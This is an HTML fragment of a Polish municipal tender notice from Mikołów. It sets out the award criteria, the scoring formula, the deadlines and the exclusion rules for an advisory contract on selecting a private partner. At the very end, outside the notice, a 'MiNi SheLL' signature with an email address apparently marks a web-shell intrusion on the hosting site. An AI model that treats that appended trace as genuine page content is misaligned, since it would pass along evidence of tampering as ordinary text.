<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Szczegółowa metodologia realizacji zamówienia w zakresie wyboru partnera prywatnego - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wykonawca zobowiązuje się wykonać moduł opcjonalny (3.5.) w nieprzekraczalnym terminie 4 miesięcy od dnia otrzymania pisemnego zlecenia. O ile takie zlecenie zostanie przekazane Wykonawcy później niż po upływie  8 miesięcy od podpisania umowy umowa zostaje przedłużona o czas niezbędny dla zachowania 4 miesięcznego terminu na wykonanie usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mikołowa Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2016 godzina 10:00, miejsce: Urząd Miasta Mikołowa Rynek 16, 43-190 Mikołów, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 16. Opis kryteriów wyboru oferty oraz sposób oceny ofert:
Zamawiający oceni i porówna jedynie oferty, które nie zostaną odrzucone.

Kryteriami oceny ofert  są:
16.1.	Cena - 60 pkt
16.2.	Szczegółowa metodologia realizacji zamówienia w zakresie wyboru partnera prywatnego - 40 pkt  
Ocenie podlegać będą następujące elementy: 
- czy wykonawca w sposób wyczerpujący, szczegółowy przedstawił propozycję realizacji zamówienia w zakresie przygotowania i przeprowadzenia postepowania na wybór partnera prywatnego (od 0 do 10 pkt.); 
- czy  koncepcja  wykonawcy  ma  charakter  uszczegóławiający  i/lub  uzupełniający  w  stosunku do opisu przedmiotu zamówienia,  w  szczególności  czy  zaproponowany  przez  wykonawcę  sposób postępowania w poszczególnych etapach wyboru partnera prywatnego (narzędzia i metody) są adekwatne do celów i charakteru projektu (od 0 do 10 pkt.); 
- czy propozycje wykonawcy są przedstawione w sposób wyczerpująco uzasadniony (od 0 do 10 pkt.);
- czy  sposób  prezentacji  przedmiotowego  materiału  w  zakresie  stosowania  jasnego,  spójnego pojęciowo  języka,  wyczerpującego  opisu  działań  oraz  czytelnego i przejrzystego  przedstawiania  związków  logicznych  między  założeniami,  zaproponowanymi działaniami a spodziewanymi rezultatami (od 0 do 10 pkt.).

Punktacja wg wzoru:               
CN/CO   x  60 pkt    +    dodatkowa ilość pkt związana uzyskanych w wyniku oceny szczegółowej metodologii realizacji zamówienia w zakresie wyboru partnera prywatnego  = ............... punktów  

*  wyjaśnienia:     CN  - oferta z najniższą ceną
                            CO  - cena oferty badanej

Oferta może uzyskać maksymalnie 100 pkt. ( 60 pkt za cenę i 40 pkt za szczegółową metodologię realizacji zamówienia w zakresie wyboru partnera prywatnego).
Ilość punktów zostanie wyliczona i zaokrąglona do dwóch miejsc po przecinku.

21.1. Zamawiający wykluczy wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com